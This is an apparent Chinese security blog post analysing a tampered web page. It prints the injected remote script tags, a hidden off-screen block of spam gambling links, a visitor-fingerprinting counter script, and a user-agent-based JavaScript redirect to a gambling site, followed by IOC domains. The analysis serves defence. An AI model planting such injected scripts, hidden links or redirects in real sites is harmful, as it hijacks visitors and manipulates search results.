页面篡改分析一处BoCai页面

XT 2020-06-11 23:23:00

BoCai网站分析

样本基本情况

本次样本如下:

1
2
3
4
5
6
7
8
<script language="javascript" src="http://count5.51yes.com/click.aspx?id=51378275&logo=1" charset="gb2312"></script>
<script src=http://www.616321.com/1.js ></script>
......
<body><div class="z7z8z9z6" style="position:fixed;left:-3000px;top:-3000px;">
<li><a href='http://www.kfqrlzy.com/20181223241252775444.html'>http://www.kfqrlzy.com/20181223241252775444.html</a></li>
......
</div class="z7z8z9z6">
......

概要分析

0x01http://count5.51yes.com/click.aspx?id=51378275&logo=1"

执行收集访问者信息并发送到http://count5.51yes.com/sa.htm统计的行为,该行为通常为收集信息行为,方便进行访问用户信息统计及身份识别。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
function y_gVal(iz){
var endstr=document.cookie.indexOf(";",iz);
if(endstr==-1) endstr=document.cookie.length;
return document.cookie.substring(iz,endstr);
}
function y_g(name){
var arg=name+"=";
var alen=arg.length;
var clen=document.cookie.length;
var i=0;var j;
while(i<clen) {
j=i+alen;
if(document.cookie.substring(i,j)==arg) return y_gVal(j);
i=document.cookie.indexOf(" ",i)+1;
if(i==0) break;
}
return null;
}
function cc_k(){
var y_e=new Date();
var y_t=93312000;var yesvisitor=1000*36000;
var yesctime=y_e.getTime();
y_e.setTime(y_e.getTime()+y_t);
var yesiz=document.cookie.indexOf("cck_lasttime");
if(yesiz==-1){
document.cookie="cck_lasttime="+yesctime+"; expires=" + y_e.toGMTString() + "; path=/";
document.cookie="cck_count=0; expires=" + y_e.toGMTString() + "; path=/";return 0;
}
else{
var y_c1=y_g("cck_lasttime");
var y_c2=y_g("cck_count");
y_c1=parseInt(y_c1);
y_c2=parseInt(y_c2);
y_c3=yesctime-y_c1;
if(y_c3>yesvisitor){
y_c2=y_c2+1;
document.cookie="cck_lasttime="+yesctime+"; expires="+y_e.toGMTString()+"; path=/";
document.cookie="cck_count="+y_c2+"; expires="+y_e.toGMTString()+"; path=/";
}
return y_c2;
}
}
var yesdata;
yesdata='&refe='+escape(document.referrer)+'&location='+escape(document.location)+'&color='+screen.colorDepth+'x&resolution='+screen.width+'x'+screen.height+'&returning='+cc_k()+'&language='+navigator.systemLanguage+'&ua='+escape(navigator.userAgent);
document.write('<a href="http://countt.51yes.com/index.aspx?id=51378275" target=_blank><img width=20 height=20 border=0 hspace=0 vspace=0 src="http://count5.51yes.com/count1.gif" alt="51YES网站统计系统"></a>');
document.write('<iframe MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no src=http://count5.51yes.com/sa.htm?id=51378275'+yesdata+' height=0 width=0></iframe>');

根据源码,可知收集的信息有:Referer,User-Agent,Location,屏幕色彩,屏幕分辨率,系统语言等。最后讲这些信息拼凑成yesdata字段发送到count5.51yes.com做记录。

0x02 http://www.616321.com/1.js(已无法访问)
0x03 http://www.kfqrlzy.com/20181223241252775444.html
1
2
<script language="javascript" src="http://count19.51yes.com/click.aspx?id=191757168&logo=1" charset="gb2312">
<script type="text/javascript" src="http://www.616321.com/sd.js"></script>

分析可知http://count19.51yes.com/click.aspx?id=191757168&logo=1同上统计作用。
http://www.616321.com/sd.js源码如下,并且我们可以推测上面1.js极有可能使用的是同样的代码。下面为sd.js的源码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
var sUserAgent= navigator.userAgent.toLowerCase();
var bIsIphoneOs= sUserAgent.match(/iphone/i) == "iphone";
var bIsSymb= sUserAgent.match(/symbianos/i) == "symbianos";
var bIsIpad= sUserAgent.match(/ipad/i) == "ipad";
var bIsIpod= sUserAgent.match(/ipod/i) == "ipod";
var bIsAndroid= sUserAgent.match(/android/i) == "android";
var bIsCE= sUserAgent.match(/windows ce/i) == "windows ce";
var bIsWM= sUserAgent.match(/windows mobile/i) == "windows mobile";
var bIsWP= sUserAgent.match(/windows phone/i) == "windows phone";

var isBDAPP=sUserAgent.match(/baiduboxapp/i) == "baiduboxapp";
var isBDBrowser=sUserAgent.match(/baidubrowser/i) == "baidubrowser";
var isM= bIsIphoneOs || bIsSymb || bIsIpad || bIsIpod || bIsAndroid || bIsCE || bIsWM || bIsWP;

if (!isM || (!isBDAPP && !isBDBrowser)){
window.location.href="http://www.450378.com/?a=592088";

可知该脚本在执行的过程中进行UA判断,并通过判断指定来自百度的手机端和电脑端用户进行跳转并引导到BoCai网站http://www.450378.com/?a=592088

最终将导致百度UA进来的用户引导到BoCai网站。

IOCs

count5.51yes.com
www.616321.com
www.450378.com
www.kfqrlzy.com